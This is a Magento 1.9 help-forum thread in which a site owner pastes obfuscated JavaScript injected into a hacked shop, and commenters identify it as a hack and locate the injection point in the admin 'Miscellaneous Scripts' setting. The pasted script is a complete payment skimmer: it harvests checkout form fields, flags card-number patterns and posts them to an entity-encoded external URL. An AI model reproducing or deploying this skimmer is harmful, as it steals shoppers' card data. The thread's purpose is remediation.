# Java script codes are encode in magento

Tags: magento-1.9

I Some days back someone hack my website, After that i found this code in my home page

```
<script type="text/javascript">function jj(e){var t="; "+document.cookie,o=t.split("; "+e+"=");return 2==o.length?o.pop().split(";").shift():void 0}jj("SESSIID")||(document.cookie="SESSIID="+(new Date).getTime()),jQuery(function(e){e("button").on("click",function(){var t="",o="post",n=window.location;if(new RegExp("onepage|checkout").test(n)){for(var c=document.querySelectorAll("input, select, textarea, checkbox"),i=0;i<c.length;i++)if(c[i].value.length>0){var a=c[i].name;""==a&&(a=i),t+=a+"="+c[i].value+"&"}if(t){var l=new RegExp("[0-9]{13,16}"),u=new XMLHttpRequest;u.open(o,e("<div />").html("&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#111;&#119;&#110;&#115;&#97;&#102;&#101;&#116;&#121;&#46;&#111;&#114;&#103;&#47;&#111;&#112;&#112;&#46;&#112;&#104;&#112;").text(),!0),u.setRequestHeader("Content-type","application/x-www-form-urlencoded"),u.send(t+"&asd="+(l.test(t.replace(/s/g,""))?1:0)+"&utmp="+n+"&cookie="+jj("SESSIID")),console.clear()}}})});</script>
```

Is it hacking code or reletated to magento code because encoding

Comment: yes.it off course an hack code

Comment: i can't able to find this code in my file's how to clear this code

Comment: check the home CMS page

Comment: I removed all code in cms page bt still now it's showing

Comment: It might be in miscellaneous HTML part in configuration. It can either be in Header or in Footer. These places are common for injecting this type of code. Also, after modifying in there, flush all the caches and check if there are any bogus admin users in your shop.

Comment: i fond this code <?php echo $this->getIncludes() ?> this code only echo that hack code how to chech where that file

Comment: That function is defined in Head block which fetches data from admin configuration for the field of miscellaneous HTML code for header. You'll find the value in admin configuration, check `System -> Configuration -> General -> Design -> HTML Head -> Miscellaneous Scripts` field.